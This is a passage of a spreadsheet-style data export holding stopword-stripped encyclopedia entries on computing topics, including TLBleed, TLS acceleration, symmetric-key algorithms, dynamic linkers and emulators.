    <t>tlbleed cryptographic side-channel attack uses machine learning exploit timing side-channel translation look-aside buffer (tlb) modern microprocessors simultaneous multithreading. june 2018, attack demonstrated experimentally intel processors; speculated processors also potentially vulnerable variant attack, proof concept demonstrated. indicated processors would vulnerable attack.the attack openbsd project disabling simultaneous multithreading intel microprocessors. openbsd project leader theo raadt stated that, attack could theoretically addressed preventing tasks different security contexts sharing physical cores, currently impractical complexity problem. also transient execution vulnerability zombieload references external links research paper</t>
  </si>
  <si>
    <t>TLS acceleration</t>
  </si>
  <si>
    <t>acceleration (formerly known acceleration) method offloading processor-intensive public-key encryption transport layer security (tls) predecessor secure sockets layer (ssl) hardware accelerator. typically means separate card plugs slot computer contains coprocessors able handle much processing. accelerators off-the-shelf cpus, custom asics risc chips difficult computational work. principle acceleration operation computationally expensive part session handshake, server (usually webserver) client (usually browser) agree number parameters establish security connection. during handshake server client establish session keys (symmetric keys, used duration given session), encryption signature handshake messages done using asymmetric keys, requires computational power symmetric cryptography used encryption/decryption session data. typically hardware accelerator offload processing handshake leaving server software process less intense symmetric cryptography actual data exchange, accelerators handle operations terminate connection, thus leaving server seeing decrypted connections. sometimes data centers employ dedicated servers acceleration reverse proxy configuration. central processor support modern cpus support advanced encryption standard (aes) encoding decoding hardware, using instruction proposed intel march 2008. allwinner technology provides hardware cryptographic accelerator a10, a20, system-on-chip series, cpus acceleration later armv8 architecture. accelerator provides public-key algorithm, several widely used symmetric-key algorithms, cryptographic hash functions, cryptographically secure pseudo-random number generator. also coprocessor public-key cryptography stunnel transport layer security application delivery controller hardware security module references external links acceleration offloading: what security implications?</t>
  </si>
  <si>
    <t>Synaptic (software)</t>
  </si>
  <si>
    <t>synaptic gtk-based graphical user interface package manager used debian linux distribution derivatives. synaptic usually used systems based packages also used systems based packages. used install, remove upgrade software packages repositories. features install, remove, upgrade downgrade single multiple packages system-wide upgrade package search utility manage package repositories find packages name, description several attributes select packages status, section, name custom filter sort packages name, status, size version browse available online documentation related package download latest changelog package lock packages current version force installation specific package version undo/redo selections built-in terminal emulator package manager allows creation download scripts (see usage details)it also following features: configure packages debconf system xapian-based fast search screenshots screenshots.debian.net usage package manager enables user install, upgrade remove software packages. install remove package user must search navigate package, mark installation removal. changes applied instantly; user must first mark changes apply them. history synaptic development funded conectiva, asked alfredo kojima, employee, write graphical front-end apt, continuing work initiated creation back-end, apt-rpm. also aptitude (software), ncurses interface gnome software packagekit references external links official website synaptic help.ubuntu.com, including improvements synaptic github page</t>
  </si>
  <si>
    <t>Emergency power system</t>
  </si>
  <si>
    <t>emergency power system independent source electrical power supports important electrical systems loss normal power supply. standby power system include standby generator, batteries apparatus. emergency power systems installed protect life property consequences loss primary electric power supply. type continual power system. they find uses wide variety settings homes hospitals, scientific laboratories, data centers, telecommunication equipment ships. emergency power systems rely generators, deep-cycle batteries, flywheel energy storage fuel cells. history emergency power systems used early world naval ships. combat, ship lose function boilers, power steam turbines ship's generator. case, diesel engines used drive back-up generators. early transfer switches relied manual operation; switches would placed horizontally, line "on" position facing other. placed between. order operate switch source must turned off, moved side source turned operation buildings mains power lost downed lines, malfunctions sub-station, inclement weather, planned blackouts extreme cases grid-wide failure. modern buildings, emergency power systems still based generators. usually, generators diesel engine driven, although smaller buildings gasoline engine driven generator. some larger building turbine. turbine takes minutes minutes) produce power.lately, made deep cycle batteries technologies flywheel energy storage fuel cells. these latter systems produce polluting gases, thereby allowing placement done within building. also, second advantage, require separate shed built fuel storage.with regular generators, automatic transfer switch used connect emergency power. side connected normal power feed emergency power feed; side connected load designated emergency. electricity comes normal side, transfer switch uses solenoid throw triple pole, double throw switch. this switches feed normal emergency power. loss normal power also triggers battery operated starter system start generator, similar using battery start engine. once transfer switch switched generator starts, building's emergency power comes back (after going normal power lost). unlike emergency lights, emergency lighting type light fixture; pattern building's normal lights provides path lights allow safe exit, lights service areas mechanical rooms electric rooms. exit signs, fire alarm systems (that back batteries) electric motor pumps fire sprinklers almost always emergency power. other equipment emergency power include smoke isolation dampers, smoke evacuation fans, elevators, handicap doors outlets service areas. hospitals emergency power outlets power life support systems monitoring equipment. some buildings even emergency power part normal operations, theater using power show equipment "the show must on." operation aviation emergency power systems aviation either aircraft ground. commercial military aircraft critical maintain power essential systems emergency. this done turbines battery emergency power supplies enables pilots maintain radio contact continue navigate using mfd, gps, receiver directional gyro hour. localizer, glideslope, instrument landing aids (such microwave transmitters) high power consumers mission-critical, cannot reliably operated battery supply, even short periods. hence, absolute reliability required (such category operations force airport) usual system diesel generator automatic switchover mains supply generator fail. this avoids interruption transmission generator brought operating speed. this opposed typical view emergency power systems, backup generators seen secondary mains electrical supply. electronic device protection computers, communication networks, modern electronic devices need power, also steady flow continue operate. source voltage drops significantly drops completely, devices fail, even power loss fraction second. because this, even generator back-up provide protection start-up time involved. achieve comprehensive loss protection, extra equipment surge protectors, inverters, sometimes complete uninterruptible power supply (ups) used. systems local device power outlet) extend building-wide. local small fits desk telecom rack powers small number devices. building-wide take several different forms, depending application. directly feeds system outlets designated feed power large number devices. since telephone exchanges building's battery room generally wired directly consuming equipment floats continuously output rectifiers normally supply rectified utility power. when utility power fails, battery carries load without needing switch. with simple though somewhat expensive system, exchanges never lost power moment since 1920s. structure operation utility stations recent years, large units utility power station usually designed unit system basis required devices, including boiler, turbine generator unit, power (step unit (auxiliary) transformer solidly connected unit. less common set-up consists units grouped together common station auxiliary. turbine generator unit attached unit auxiliary transformer, connected circuit automatically. starting unit, auxiliaries supplied power another unit (auxiliary) transformer station auxiliary transformer. period switching first unit transformer next unit designed automatic, instantaneous operation times emergency power system needs kick imperative power unit auxiliaries fail station shutdown occurrence known black-out regular units temporarily fail). instead, shutdowns grid expected remain operational. when problems occur, usually reverse power relays frequency-operated relays grid lines severe grid disturbances. under circumstances, emergency station supply must kick avoid damage equipment prevent hazardous situations release hydrogen generators local environment. controlling emergency power system emergency supply system, central battery system automatic controls, located power station building, used avoid long electric supply wires. this central battery system consists lead-acid battery cell units make system well stand-by cells, battery charging unit. also needed voltage sensing unit capable receiving automatic system able signal activate emergency supply circuit case failure station supply. references external links emergency power systems work difference battery deep-cycle batteries</t>
  </si>
  <si>
    <t>SymmetricDS</t>
  </si>
  <si>
    <t>symmetricds open source software database file synchronization multi-master replication, filtered synchronization, transformation capabilities. designed scale large number nodes, work across low-bandwidth connections, withstand periods network outage. data synchronization occurs asynchronously scheduled job, data changes sent push pull operation. uses standard protocols (http) database technologies (jdbc) order support wide range platforms maximize interoperability. includes support oracle, mysql, mariadb, postgresql, greenplum, server, server azure, hsqldb, derby, db2, firebird, informix, interbase, sqlite, sybase ase, sybase asa, mongodb, amazon_redshift, voltdb databases. functionality symmetricds runs either standalone server (using built-in jetty), within application server (such apache tomcat), embedded application. configuration done properties files collection configuration tables central node. both database tables filesystems synchronized across network nodes. configuration allows selection tables, columns (vertical filtering), subsets rows (horizontal filtering) synchronize direction directions. files selected base directory whether recurse directories. wildcard characters used match multiple tables files. tables grouped channels sync based priority. groups nodes linked together assigned transport method push pull. push connect node send changes ready, pull periodically connect node check changes available. several network topologies possible linking node groups, including fan-in/out, multi-master, star, multi-tier tree. node prepared initial load data populate database. changes grouped batches assigned delivery nodes using routers. routers configured scripted filter data make decisions nodes receive data. batches delivered synchronization tracked using sequence number status, periodic retries designed automatically recover errors. administration tools command line web-based console included manage nodes central location. programming interfaces java rest included extend customize behavior. prominent users openmrs open source medical record system openboxes supply chain management software also multi-master replication comparison file synchronization software replication (computer science) references external links symmetricds community website symmetricds source code</t>
  </si>
  <si>
    <t>Dynamic testing</t>
  </si>
  <si>
    <t>dynamic testing dynamic analysis) term used software engineering describe testing dynamic behavior code. that dynamic analysis refers examination physical response system variables constant change time. dynamic testing software must actually compiled run. involves working software, giving input values checking output expected executing specific test cases done manually automated process. this contrast static testing. unit tests, integration tests, system tests acceptance tests utilize dynamic testing. usability tests involving mock version made paper cardboard classified static tests taking account program executed; dynamic ones considering interaction users mock version effectively basic form prototype. main procedure process function dynamic testing software development, dynamic testing divided unit testing, integration testing, system testing, acceptance testing finally regression testing. unit testing test focuses correctness basic components software. unit testing falls category white-box testing. entire quality inspection system, unit testing needs completed product group, software handed testing department. integration testing used detect interfaces various units properly connected integration process entire software. testing software system completed integration called system test, purpose test verify correctness performance software system meet requirements specified specifications. testers follow established test plan. when testing robustness ease software, input, output, dynamic operational behaviour compared software specifications. software specification incomplete, system test dependent tester's work experience judgment, test sufficient. system test black-box testing. this final test software use. buyer's trial process software. actual work company, usually implemented asking customer release beta version software. acceptance test black-box testing. purpose regression testing verify modify acceptance test results software maintenance phase. practical applications, handling customer complaints embodiment regression testing. evaluation advantages dynamic testing could identify weak areas runtime environment. dynamic testing supports application analysis even tester actual code. dynamic testing could identify vulnerabilities difficult find static testing. dynamic testing also could verify correctness static testing results. dynamic testing could applied application.disadvantages automated tools give wrong security, check everything. automated tools generate false positives false negatives. finding trained dynamic test professionals easy. dynamic testing hard track vulnerabilities code, takes longer problem. therefore, fixing bugs becomes expensive. also dynamic load testing dynamic program analysis time partition testing, model-based testing methodology reactive test dynamical control systems. daikon, dynamic invariant generator. references g.j. myers, software testing, john wiley sons, york, york, 1979. external links dynamic software testing applications umpire</t>
  </si>
  <si>
    <t>Dynamic secrets</t>
  </si>
  <si>
    <t>dynamic secrets novel management scheme secure communications. proposed sheng xiao, weibo gong, towsley. first academic publication nominated infocom 2010 best paper award. later monograph published springer extend scheme framework.dynamic secrets applied bi-directional communication systems single-directional communication systems improve communication security. there three main benefits: encryption authentication keys rapidly automatically updated pair communication devices update process binds communication process incurs negligible computing bandwidth cost cloned either authentication encrypted communication guaranteed detected. detection false alarms cost computing networking resources. (dynamic secrets automatically break secure communication clone legitimate co-exist. however, order find attacker, takes actions consumes computing power network bandwidth.) references</t>
  </si>
  <si>
    <t>Symmetric-key algorithm</t>
  </si>
  <si>
    <t>symmetric-key algorithms algorithms cryptography cryptographic keys encryption plaintext decryption ciphertext. keys identical, simple transformation keys. keys, practice, represent shared secret parties used maintain private information link. requirement parties access secret main drawbacks symmetric-key encryption, comparison public-key encryption (also known asymmetric-key encryption). however, symmetric-key encryption algorithms usually better bulk encryption. they smaller size, means less storage space faster transmission. this, asymmetric-key encryption often used exchange secret symmetric-key encryption. types symmetric-key encryption either stream ciphers block ciphers. stream ciphers encrypt digits (typically bytes), letters substitution ciphers) message time. example chacha20. substitution ciphers well-known ciphers, easily decrypted using frequency table. block ciphers take number bits encrypt single unit, padding plaintext multiple block size. advanced encryption standard (aes) algorithm, approved nist december 2001, uses 128-bit blocks. implementations examples popular symmetric-key algorithms include twofish, serpent, (rijndael), camellia, salsa20, chacha20, blowfish, cast5, kuznyechik, rc4, des, 3des, skipjack, safer, idea. cryptographic primitive symmetric ciphers commonly used achieve cryptographic primitives encryption.encrypting message guarantee remain unchanged encrypted. hence, often message authentication code added ciphertext ensure changes ciphertext noted receiver. message authentication codes constructed aead cipher (e.g. aes-gcm). however, symmetric ciphers cannot used non-repudiation purposes except involving additional parties. iso/iec 13888-2 standard. another application build hash functions block ciphers. one-way compression function descriptions several methods. construction symmetric ciphers many modern block ciphers based construction proposed horst feistel. feistel's construction makes possible build invertible functions functions invertible. security symmetric ciphers symmetric ciphers historically susceptible known-plaintext attacks, chosen-plaintext attacks, differential cryptanalysis linear cryptanalysis. careful construction functions round greatly reduce chances successful attack. also possible increase length rounds encryption process better protect attack. this, however, tends increase processing power decrease speed process runs amount operations system needs management establishment symmetric-key algorithms require sender recipient message secret key. early cryptographic systems required either sender recipient somehow receive copy secret physically secure channel. nearly modern cryptographic systems still symmetric-key algorithms internally encrypt bulk messages, eliminate need physically secure channel using diffie–hellman exchange public-key protocol securely come agreement fresh secret session/conversation (forward secrecy). generation when used asymmetric ciphers transfer, pseudorandom generators nearly always used generate symmetric cipher session keys. however, lack randomness generators initialization vectors disastrous cryptanalytic breaks past. therefore, essential implementation source high entropy initialization. reciprocal cipher reciprocal cipher cipher where, enters plaintext cryptography system ciphertext, could enter ciphertext place system plaintext. reciprocal cipher also sometimes referred self-reciprocal cipher.practically mechanical cipher machines implement reciprocal cipher, mathematical involution typed-in letter. instead designing kinds machines, encrypting decrypting, machines identical (keyed) way.examples reciprocal ciphers include: atbash beaufort cipher enigma machine marie antoinette axel fersen communicated self-reciprocal cipher. porta polyalphabetic cipher self-reciprocal. purple cipher rot13 cipher vatsyayana cipherthe majority modern ciphers classified either stream cipher, reciprocal cipher combiner, block cipher, feistel cipher lai–massey scheme reciprocal transformation round. notes references</t>
  </si>
  <si>
    <t>EmuDX</t>
  </si>
  <si>
    <t>emudx first publicly released emulator playing genuine arcade games remade graphics, music, sound effects. since emulator used actual images, game-play stayed true arcade original. emulator originally entitled pacdx, emulated midway arcade version pac-man. later renamed emudx support games added. although emudx recently resurrected versions works android html5 (canvas) based devices. mike green aided raine team adding emudx content packs emulator. compatibility last publicly released version emudx (version 1.0) supports following games: donkey kong frogger galaxian pac-man pac-man external links official emudx homepage (web.archive.org) sys2064's emudx page (web.archive.org) zone emudx review september 2002 zone raine emudx review christmas 2004 arcade home emudx page emudx page caesar</t>
  </si>
  <si>
    <t>Dynamic recompilation</t>
  </si>
  <si>
    <t>computer science, dynamic recompilation feature emulators virtual machines, system recompile part program execution. compiling execution, system tailor generated code reflect program's run-time environment, potentially produce efficient code exploiting information available traditional static compiler. uses most dynamic recompilers used convert machine code architectures runtime. this task often needed emulation legacy gaming platforms. cases, system employ dynamic recompilation part adaptive optimization strategy execute portable program representation java .net common language runtime bytecodes. full-speed debuggers also utilize dynamic recompilation reduce space overhead incurred deoptimization techniques, features dynamic thread migration. tasks main tasks dynamic recompiler perform are: reading machine code source platform emitting machine code target platforma dynamic recompiler also perform auxiliary tasks: managing cache recompiled code updating elapsed cycle counts platforms cycle count registers management interrupt checking providing interface virtualized support hardware, example optimizing higher-level code structures efficiently target hardware (see below) applications many java virtual machines feature dynamic recompilation. apple's rosetta x86, allows powerpc code architecture. later versions emulator used classic 680x0 code powerpc hardware. psyco, specializing compiler python. dynamo project, example transparent binary dynamic optimizer. dynamorio, open-source successor dynamo works arm, x86-64 ia-64 (itanium) instruction sets. vx32 virtual machine employs dynamic recompilation create os-independent architecture sandboxes safe application plugins. microsoft virtual mac, used code powerpc. freekeyb, international keyboard console driver many usability enhancements utilized self-modifying code dynamic dead code elimination minimize in-memory image based user configuration (selected features, languages, layouts) actual runtime environment variant version, loaded drivers, underlying hardware), automatically resolving dependencies, dynamically relocating recombining code sections byte-level granularity optimizing opstrings based semantic information provided source code, relocation information generated special tools assembly profile information obtained load time. backwards compatibility functionality xbox (i.e. running games written original xbox) widely assumed dynamic recompilation. apple's rosetta apple silicon, permits many applications compiled x86-64-based processors translated execution apple silicon. emulators pcsx2, sony playstation emulator, recompiler called "microvu", successor "supervu". gcemu, nintendo gamecube emulator. gem, nintendo game emulator uses optimizing dynamic recompiler. desmume, nintendo emulator, dynarec option. soywiz's psp, sony playstation portable emulator, dynarec option. mupen64plus, multi-platform nintendo emulator. yabause, multi-platform saturn emulator. ppsspp, multi-platform playstation portable emulator, uses dynamic recompiler default. also binary recompiler binary translation comparison platform virtualization software just-in-time compilation instrumentation (computer programming) references external links dynamic recompiler tutorial blog posts writing mips dynamic recompiler</t>
  </si>
  <si>
    <t>Dynamic linker</t>
  </si>
  <si>
    <t>computing, dynamic linker part operating system loads links shared libraries needed executable executed "run time"), copying content libraries persistent storage ram, filling jump tables relocating pointers. specific operating system executable format determine dynamic linker functions implemented. linking often referred process performed executable compiled, dynamic linker special part operating system loads external shared libraries running process binds shared libraries dynamically running process. this approach also called dynamic linking late linking. implementations microsoft windows dynamic-link library, dll, microsoft's implementation shared library concept microsoft windows os/2 operating systems. these libraries usually file extension dll, (for libraries containing activex controls), (for legacy system drivers). file formats dlls windows files portable executable (pe) 32-bit 64-bit windows, executable (ne) 16-bit windows. exes, dlls contain code, data, resources, combination. data files file format dll, different file extensions possibly containing resource sections, called resource dlls. examples dlls include icon libraries, sometimes extension icl, font files, extensions fot. unix-like systems using elf, darwin-based systems unix-like systems, machine code makes dynamic linker actually external executable operating system kernel loads executes first process address space newly constructed result calling exec posix_spawn functions. link time, path dynamic linker used embedded executable image. when executable file loaded, operating system kernel reads path dynamic linker attempts load execute executable binary; attempt fails because, example, file path, attempt execute original executable fails. dynamic linker loads initial executable image dynamically-linked libraries depends starts executable. result, pathname dynamic linker part operating system's application binary interface. systems using unix-like systems executable images dynamic libraries, solaris, 64-bit versions hp-ux, linux, freebsd, netbsd, openbsd, dragonfly bsd, path dynamic linker used embedded link time .interp section executable's pt_interp segment. systems, dynamically loaded shared libraries identified filename suffix (shared object). dynamic linker influenced modifying behavior either program's execution program's linking, examples seen run-time linker manual pages various unix-like systems. typical modification behavior ld_library_path ld_preload environment variables, adjust runtime linking process searching shared libraries alternate locations forcibly loading linking libraries would otherwise respectively. example zlibc, also known uncompress.so, facilitates transparent decompression used ld_preload hack; consequently, possible read pre-compressed (gzipped) file data linux systems files compressed, essentially allowing user transparent compression underlying filesystem, although caveats. mechanism flexible, allowing trivial adaptation code perform additional alternate processing data file read, prior provision said data user process requested macos apple darwin operating system, macos operating systems built path dynamic linker used embedded link time mach-o load commands executable image. systems, dynamically loaded shared libraries identified either filename suffix .dylib placement inside bundle framework. dynamic linker links target executable shared libraries also places machine code functions specific address points memory target executable knows link time. when executable wishes interact dynamic linker, simply executes machine-specific call jump instruction well-known address points. executables macos platforms often interact dynamic linker execution process; even known executable might interact dynamic linker, causing load libraries resolve symbols, hours initially launches. reason macos program interacts dynamic linker often apple's cocoa cocoa touch apis objective-c, language implemented (see main articles information). dynamic linker coerced modifying behavior; however, unlike unix-like operating systems, modifications hints (and sometimes are) ignored dynamic linker. examples seen dyld's manual page. typical modification behavior dyld_framework_path dyld_print_libraries environment variables. former previously-mentioned variables adjusts executables' search path shared libraries, latter displays names libraries loaded linked. apple's macos dynamic linker open-source project released part darwin found apple's open-source dyld project. xcoff-based unix-like systems unix-like operating systems using xcoff, aix, dynamically-loaded shared libraries filename suffix dynamic linker influenced modifying behavior either program's execution program's linking. typical modification behavior libpath environment variable. this variable adjusts runtime linking process searching shared libraries alternate locations forcibly loading linking libraries would otherwise respectively. os/360 successors dynamic linking assembler language programs os/360 successors done typically using link macro instruction containing supervisor call instruction activates operating system routines makes library module linked available program. library modules reside "steplib" "joblib" specified control cards available specific execution program, library included linklist parmlib (specified system startup time), "link pack area" specific reentrant modules loaded system startup time. multics multics operating system files, including executables, segments. call routine part current segment cause system find referenced segment, memory disk, address space running process. dynamic linking normal method operation, static linking (using binder) exception. efficiency dynamic linking generally slower (requires cycles) linking compilation time, case processes executed runtime. however, dynamic linking often space-efficient disk memory runtime). when library linked statically, every process linked copy library functions called upon. therefore, library called upon many times different programs, functions library duplicated several places system's memory. using shared, dynamic libraries means that, instead linking file copy library compilation time potentially wasting memory space, copy library ever stored memory time, freeing memory space used elsewhere. additionally, dynamic linking, library loaded actually used. also direct binding hell dynamic loading late binding prelink dynamic dead code elimination notes references further reading levine, john (2000) [october 1999]. linkers loaders. morgan kaufmann series software engineering programming ed.). francisco, usa: morgan kaufmann. isbn 1-55860-496-0. oclc 42413382. archived original 2012-12-05. retrieved 2020-01-12. code: [1][2] errata: external links dynamic linking loading, iecc.com dynamic linking linux windows, part one, symantec.com anatomy linux dynamic libraries, ibm.com</t>
  </si>
  <si>
    <t>Emulator</t>
  </si>
  <si>
    <t>computing, emulator hardware software enables computer system (called host) behave like another computer system (called guest). emulator typically enables host system software peripheral devices designed guest system. emulation refers ability computer program electronic device emulate imitate) another program device. many printers, example, designed emulate laserjet printers much software written printers. non-hp printer emulates printer, software written real printer also non-hp printer emulation produce equivalent printing. since least 1990s, many video game enthusiasts hobbyists used emulators play classic arcade games 1980s using games' original 1980s machine code data, interpreted current-era system, emulate video game consoles. hardware emulator emulator takes form hardware device. examples include dos-compatible card installed 1990s-era macintosh computers, centris performa 630, allowed personal computer (pc) software programs field-programmable gate array-based hardware emulators. church-turing thesis implies theoretically, operating environment emulated within environment, assuming memory limitations ignored. however, practice, quite difficult, particularly exact behavior system emulated documented deduced reverse engineering. also says nothing timing constraints; emulator perform quickly using original hardware, software inside emulation much slowly (possibly triggering timer interrupts alter behavior). "can commodore emulate ms-dos?" yes, possible [commodore] emulate [which uses ms-dos], sense possible bail lake michigan teaspoon. types most emulators emulate hardware architecture—if operating system firmware software required desired software, must provided well (and emulated). both software interpreted emulator, rather native hardware. apart interpreter emulated binary machine's language, hardware (such input output devices) must provided virtual form well; example, writing specific memory location influence displayed screen, would need emulated. while emulation could, taken extreme, atomic level, basing output simulation actual circuitry virtual power source, would highly unusual solution. emulators typically stop simulation documented hardware specifications digital logic. sufficient emulation hardware platforms requires extreme accuracy, level individual clock cycles, undocumented features, unpredictable analog elements, implementation bugs. this particularly case classic home computers commodore whose software often depends highly sophisticated low-level programming tricks invented game programmers "demoscene". contrast, platforms little direct hardware addressing, emulator playstation cases, simple compatibility layer suffice. this translates system calls foreign system system calls host system e.g., linux compatibility layer used *bsd closed source linux native software freebsd netbsd. example, nintendo graphic processor fully programmable, games used pre-made programs, mostly self-contained communicated game fifo; therefore, many emulators emulate graphic processor all, simply interpret commands received original program would. developers software embedded systems video game consoles often design software especially accurate emulators called simulators trying real hardware. this software produced tested final hardware exists large quantities, tested without taking time copy program debugged level without introducing side effects debugger. many cases, simulator actually produced company providing hardware, theoretically increases accuracy. math co-processor emulators allow programs compiled math instructions machines co-processor installed, extra work done slow system down. math coprocessor installed present cpu, executes co-processor instruction make determined interrupt (coprocessor available), calling math emulator routines. when instruction successfully emulated, program continues executing. logic simulators logic simulation computer program simulate operation digital circuit processor. this done digital circuit designed logic equations, circuit fabricated hardware. functional emulators functional simulation computer program simulate execution second computer program written symbolic assembly language compiler language, rather binary machine code. using functional simulator, programmers execute trace selected sections source code search programming errors (bugs), without generating binary code. this distinct simulating execution binary code, software emulation. first functional simulator written autonetics 1960 testing assembly language programs later execution military computer d-17b. this made possible flight programs written, executed, tested d-17b computer hardware built. autonetics also programmed functional simulator testing flight programs later execution military computer d-37c. video game console emulators video game console emulators programs allow personal computer video game console emulate another video game console. they often used play older 1980s 2000s-era video games modern personal computers contemporary video game consoles. they also used translate games languages, modify existing games, development process "home brew" demos creation games older systems. internet helped spread console emulators, would unavailable sale retail outlets. examples console emulators released last decades are: rpcs3, dolphin, cemu, pcsx2, ppsspp, zsnes, citra, epsxe, project64, visual advance, nestopia, yuzu. popularity, emulators impersonated malware. most emulators video game consoles like xbox 360, xbox one, nintendo 3ds, etc. generally emulators make currently impossible claims able xbox xbox games single program. legal issues computers global computer networks continued advance emulator developers grew skilled work, length time commercial release console successful emulation began shrink. fifth generation consoles nintendo playstation sixth generation handhelds, game advance, significant progress toward emulation production. this effort console manufacturers stop unofficial emulation, consistent failures sega accolade f.2d 1510 (9th cir. 1992), sony computer entertainment, inc. connectix corporation f.3d (2000), sony computer entertainment america bleem f.3d 1022 (2000), opposite effect. according legal precedents, emulation legal within united states. however, unauthorized distribution copyrighted code remains illegal, according country-specific copyright international copyright berne convention. under united states law, obtaining dumped copy original machine's bios legal ruling lewis galoob toys, inc. nintendo america, inc., f.2d (9th cir. 1992) fair long user obtained legally purchased copy machine. mitigate however, several emulators platforms game advance capable running without bios file, using high-level emulation simulate bios subroutines slight cost emulation accuracy. terminal terminal emulators software programs provide modern computers devices interactive access applications running mainframe computer operating systems host systems hp-ux openvms. terminals 3270 vt100 many others longer produced physical devices. instead, software running modern operating systems simulates "dumb" terminal able render graphical text elements host application, send keystrokes process commands using appropriate terminal protocol. some terminal emulation applications include attachmate reflection, personal communications, micro focus rumba. other types other types emulators include: hardware emulator: process imitating behavior pieces hardware (typically system design) another piece hardware, typically special purpose emulation system in-circuit emulator: hardware device debug software embedded systemfloating-point emulator: some floating-point hardware supports simplest operations: addition, subtraction, multiplication. systems without floating-point hardware, emulates using series simpler fixed-point arithmetic operations integer arithmetic logic unit. instruction simulator high-level programming language: mimics behavior mainframe microprocessor "reading" instructions maintaining internal variables represent processor's registers. network emulation: technique testing performance real applications virtual network. this different network simulation virtual models traffic, network models, channels, protocols applied. server emulator: multiplayer video games often rely online game server, available on-premises installation. server emulator unofficial on-premises server imitates behavior official online server, even though internal working might different. semulation: process controlling emulation simulator structure organization typically, emulator divided modules correspond roughly emulated computer's subsystems. most often, emulator composed following modules: emulator simulator (the terms mostly interchangeable case), unless target emulated architecture host, case virtual machine layer used instead memory subsystem module various input/output (i/o) device emulatorsbuses often emulated, either reasons performance simplicity, virtual peripherals communicate directly memory subsystem. memory subsystem possible memory subsystem emulation reduced simply array elements sized like emulated word; however, model fails quickly soon location computer's logical memory match physical memory. this clearly case whenever emulated hardware allows advanced memory management case, logic embedded memory emulator, made module own, sometimes integrated simulator). even emulated computer feature mmu, though, usually factors break equivalence logical physical memory: many most) architectures offer memory-mapped i/o; even often block logical memory mapped rom, means memory-array module must discarded read-only nature emulated. features bank switching segmentation also complicate memory emulation. result, emulators implement least procedures writing reading logical memory, procedures' duty every access correct location correct object. base-limit addressing system memory address address romsize-1 read-only memory, rest ram, something along line following procedures would typical: simulator simulator often complicated part emulator. many emulators written using "pre-packaged" simulators, order concentrate good efficient emulation specific machine. simplest form simulator interpreter, computer program follows execution flow emulated program code and, every machine code instruction encountered, executes operations host processor semantically equivalent original instructions. this made possible assigning variable register flag simulated cpu. logic simulated less directly translated software algorithms, creating software re-implementation basically mirrors original hardware implementation. following example illustrates simulation accomplished interpreter. case, interrupts checked-for every instruction executed, though behavior rare real emulators performance reasons generally faster subroutine work interrupt). interpreters popular computer simulators, much simpler implement time-efficient alternative solutions, speed adequate emulating computers roughly decade modern machines. however, speed penalty inherent interpretation problem emulating computers whose processor speed order magnitude host machine. until many years ago, emulation situations considered completely impractical many. what allowed breaking restriction advances dynamic recompilation techniques. simple priori translation emulated program code code runnable host architecture usually impossible several reasons: code modified ram, even modified emulated operating system loading code (for example disk) reliably distinguish data (which translated) executable code.various forms dynamic recompilation, including popular just time compiler (jit) technique, circumvent problems waiting processor control flow jumps location containing untranslated code, ("just time") translates block code host code executed. translated code kept code cache, original code lost affected; way, even data segments (meaninglessly) translated recompiler, resulting waste translation time. speed desirable older games designed speed faster computers mind. game designed level timer game seconds might give player seconds other programs, programs, even faster computers. particularly emulating computers "closed-box", changes core system typical, software techniques depend specific characteristics computer (e.g. cpu's speed) thus precise control speed emulation important applications properly emulated. input/output (i/o) most emulators not, mentioned earlier, emulate main system bus; device thus often treated special case, consistent interface virtual peripherals provided. this result performance advantage, since module tailored characteristics emulated device; designs based standard, unified can, however, rival simpler models, well thought-out, additional advantage "automatically" providing plug-in service third-party virtual devices used within emulator. unified necessarily mirror structure real hardware bus: design limited several electric constraints need hardware concurrency management mostly ignored software implementation. even emulators treat device special case, usually common basic infrastructure for: managing interrupts, means procedure sets flags readable simulator whenever interrupt raised, allowing virtual "poll (virtual) interrupts" writing reading physical memory, means procedures similar ones dealing logical memory (although, contrary latter, former often left out, direct references memory array employed instead) applications preservation emulation strategy pursuit digital preservation combating obsolescence. emulation focuses recreating original computer environment, time-consuming difficult achieve, valuable ability maintain closer connection authenticity digital object, operating system, even gaming platform. emulation addresses original hardware software environment digital object, recreates current machine. emulator allows user access kind application operating system current platform, software runs original environment. jeffery rothenberg, early proponent emulation digital preservation strategy states, "the ideal approach would provide single extensible, long-term solution designed applied uniformly, automatically, organized synchrony (for example, every refresh cycle) types documents media". states apply date systems, also upwardly mobile future unknown systems. practically speaking, certain application released version, rather address compatibility issues migration every digital object created previous version application, could create emulator application, allowing access said digital objects. media because primary digital formats, media relies heavily emulation preservation strategy. artists cory arcangel specialize resurrecting obsolete technologies artwork recognize importance decentralized deinstitutionalized process preservation digital culture. many cases, goal emulation media preserve digital medium saved indefinitely reproduced without error, reliance hardware ages becomes obsolete. paradox emulation emulator made work future computers. future systems design emulation techniques commonly used design development systems. eases development process providing ability detect, recreate repair flaws design even system actually built. particularly useful design multi-core systems, concurrency errors difficult detect correct without controlled environment provided virtual hardware. this also allows software development take place hardware ready, thus helping validate design decisions give little control. comparison simulation word "emulator" coined 1963 development (ibm system/360) product line, using "new combination software, microcode, hardware". they discovered simulation using additional instructions implemented microcode hardware, instead software simulation using standard instructions, execute programs written earlier computers dramatically increased simulation speed. earlier, provided simulators for, e.g., 705. addition simulators, compatibility features 7090, provided computer program legacy programs written later 7090. this program used instructions added compatibility feature trap instructions requiring special handling; instructions 7090. compatibility feature 1410 required setting console toggle switch, support program. 1963, microcode first used speed simulation process, engineers coined term "emulator" describe concept. 2000s, become common word "emulate" context software. however, 1980, "emulation" referred emulation hardware microcode assist, "simulation" referred pure software emulation. example, computer specially built running programs designed another architecture emulator. contrast, simulator could program runs atari games simulated purists continue insist distinction, currently term "emulation" often means complete imitation machine executing binary code "simulation" often refers computer simulation, computer program used simulate abstract model. computer simulation used virtually every scientific engineering domain computer science exception, several projects simulating abstract models computer systems, network simulation, practically semantically differs network emulation. comparison hardware virtualization hardware virtualization virtualization computers complete hardware platforms, certain logical abstractions components, functionality required various operating systems. virtualization hides physical characteristics computing platform users, presenting instead abstract computing platform. origins, software controlled virtualization called "control program", terms "hypervisor" "virtual machine monitor" became preferred time. each hypervisor manage multiple virtual machines. also list emulators list computer system emulators qemu (emulator) references external links gameloop emulators .emulator curlie</t>
  </si>
  <si>
    <t>EnGarde Secure Linux</t>
  </si>
  <si>
